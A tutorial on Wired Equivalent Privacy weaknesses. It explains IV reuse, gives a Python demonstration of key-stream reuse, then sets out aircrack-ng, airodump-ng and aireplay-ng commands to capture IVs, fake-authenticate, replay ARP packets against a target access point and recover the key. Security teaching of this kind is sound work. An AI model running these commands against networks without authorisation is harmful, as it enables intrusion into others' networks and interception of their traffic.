WEP

Wired Equivalent Privacy (WEP) is an older security protocol used to secure Wi-Fi networks. However, it is now considered highly insecure and outdated due to several critical flaws.

An Initialization Vector (IV) is combined with the shared secret key/password to produce a different Key Stream for each packet. The problem is that the IV is only 24 bits, so on a busy network the same IV (and therefore the same Key Stream) is eventually reused: an IV collision.

IV + Secret Key = Key Stream (the IV is prepended to the secret key to seed the per-packet stream cipher)

Key Stream XOR Packet = Encrypted Packet

WEP prepends the IV in plain text to the Encrypted Packet so that the router can use it to decrypt the packet. Because the IV is visible, sniffing network traffic lets an observer spot when an IV repeats, and two packets encrypted under the same IV share a Key Stream, which can then be determined.
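An added illustration (not from the original page) of the two points above: why a 24-bit IV space runs out quickly, and what a repeated IV leaks. It uses a SHA-256 counter as a stand-in for WEP's RC4 key stream, which is an assumption made only so the example runs stand-alone; the reuse property it demonstrates does not depend on the cipher. Key, IV and packet contents are constructed sample values.

```python
import hashlib
import math

IV_SPACE = 1 << 24      # WEP IVs are 24 bits: 16,777,216 possible values


def keystream(iv: bytes, key: bytes, length: int) -> bytes:
    # Stand-in for WEP's per-packet key stream (real WEP seeds RC4 with IV || key;
    # SHA-256 in counter mode is used here only so the example runs offline).
    # What matters is unchanged: same IV with the same key -> same key stream.
    out, block = b"", 0
    while len(out) < length:
        out += hashlib.sha256(iv + key + block.to_bytes(4, "big")).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(iv: bytes, key: bytes, packet: bytes) -> bytes:
    # Encrypted Packet = Key Stream XOR Packet, with the 3-byte IV sent in clear.
    return iv + xor(packet, keystream(iv, key, len(packet)))


def keystream_reuse_leak(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bytes:
    # Two packets under one IV: XORing the ciphertexts cancels the key stream and
    # leaves P1 XOR P2, which an observer obtains without knowing the key. Any
    # known plaintext (a fixed protocol header, say) then exposes the key stream.
    c1 = encrypt(iv, key, p1)[3:]           # strip the cleartext IV
    c2 = encrypt(iv, key, p2)[3:]
    return xor(c1, c2)


def collision_probability(packets: int) -> float:
    # Birthday bound: chance that at least one IV repeats after `packets`
    # packets, with IVs drawn uniformly from the 24-bit space.
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * IV_SPACE))


def packets_for_50_percent() -> int:
    # Smallest packet count at which an IV repeat is more likely than not.
    n = 2
    while collision_probability(n) < 0.5:
        n += 1
    return n


if __name__ == "__main__":
    key, iv = b"constructed-key", bytes.fromhex("0a1b2c")          # constructed
    p1, p2 = b"ARP who-has 10.0.0.1", b"ARP who-has 10.0.0.9"      # constructed
    assert keystream_reuse_leak(key, iv, p1, p2) == xor(p1, p2)
    print("packets for a 50% chance of IV reuse:", packets_for_50_percent())
    print("P(IV reuse) after 10,000 packets: %.3f" % collision_probability(10000))
```

Run it and the birthday bound lands just under 5,000 packets for a coin-flip chance of reuse, which a single busy client produces in minutes.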

Note that these attacks were done using a Wi-Fi adapter that supports monitor mode, such as an Alfa Wi-Fi adapter.

Setup

```bash
## Kill processes that may interfere with monitor mode
airmon-ng check kill

## Start monitor mode on the adapter
airmon-ng start [network interface]
```

Exploit

```bash
## Sniff packets on a specific BSSID and save them to a file for analysis
airodump-ng [interface] --bssid [bssid] --channel [channel] --write [output file]

## Analyze the captured IVs with aircrack-ng to recover the WEP key
aircrack-ng [airodump.cap file]
```

If the WEP network isn't generating enough IVs on its own, you can associate your adapter with the AP, then capture an ARP packet and re-transmit it so the AP keeps producing new IVs while you sniff traffic.

```bash
## Associate your wireless adapter with the target AP
aireplay-ng --fakeauth [time interval] -a [target bssid] -h [interface mac] [interface]

## Capture an ARP packet on the network and re-transmit it to create traffic
aireplay-ng --arpreplay -b [target bssid] -h [interface mac] [interface]
```
